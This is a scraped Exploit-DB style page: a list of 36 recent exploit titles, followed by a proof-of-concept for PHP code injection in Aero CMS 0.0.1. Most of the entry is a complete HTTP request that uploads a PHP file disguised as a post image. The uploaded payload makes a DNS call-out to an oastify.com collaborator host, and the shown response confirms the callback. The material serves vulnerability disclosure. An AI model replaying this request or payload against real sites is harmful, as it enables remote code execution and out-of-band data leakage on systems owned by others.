
36 changes to exploits/shellcodes/ghdb MiniDVBLinux 5.4 - Change Root Password MiniDVBLinux 5.4 - Remote Root Command Injection MiniDVBLinux 5.4 - Arbitrary File Read MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) MiniDVBLinux <=5.4 - Config Download Exploit Desktop Central 9.1.0 - Multiple Vulnerabilities FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Aero CMS v0.0.1 - PHP Code Injection (auth) Aero CMS v0.0.1 - SQL Injection (no auth) Atom CMS v2.0 - SQL Injection (no auth) Canteen-Management v1.0 - SQL Injection Canteen-Management v1.0 - XSS-Reflected Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) WebTareas 2.4 - RCE (Authorized) WebTareas 2.4 - Reflected XSS (Unauthorised) WebTareas 2.4 - SQL Injection (Unauthorised) WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Grafana <=6.2.4 - HTML Injection Hex Workshop v6.7 - Buffer overflow DoS Scdbg 1.0 - Buffer overflow DoS Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) AVS Audio Converter 10.3 - Stack Overflow (SEH) Explorer32++ v1.3.5.531 - Buffer overflow Frhed (Free hex editor) v1.6.0 - Buffer overflow Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path Resource Hacker v3.6.0.92 - Buffer overflow Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
74 lines
No EOL
3.1 KiB
Text
74 lines
No EOL
3.1 KiB
Text
# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
|
|
# Date: 15/10/2022
|
|
# Exploit Author: Hubert Wojciechowski
|
|
# Contact Author: hub.woj12345@gmail.com
|
|
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
|
|
# Software Link: https://github.com/MegaTKC/AeroCMS
|
|
# Version: 0.0.1
|
|
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
|
|
|
## Example
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Param: image content uploading image
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Req
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
|
|
POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
|
|
Content-Length: 1156
|
|
Origin: http://127.0.0.1
|
|
Connection: close
|
|
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
|
|
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_title"
|
|
|
|
mmmmmmmmmmmmmmmmm
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_category_id"
|
|
|
|
1
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_user"
|
|
|
|
admin
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_status"
|
|
|
|
draft
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
|
|
Content-Type: text/plain
|
|
|
|
<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_tags"
|
|
|
|
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="post_content"
|
|
|
|
<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
|
|
-----------------------------369779619541997471051134453116
|
|
Content-Disposition: form-data; name="create_post"
|
|
|
|
Publish Post
|
|
-----------------------------369779619541997471051134453116--
|
|
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Res:
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
|
|
The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com. |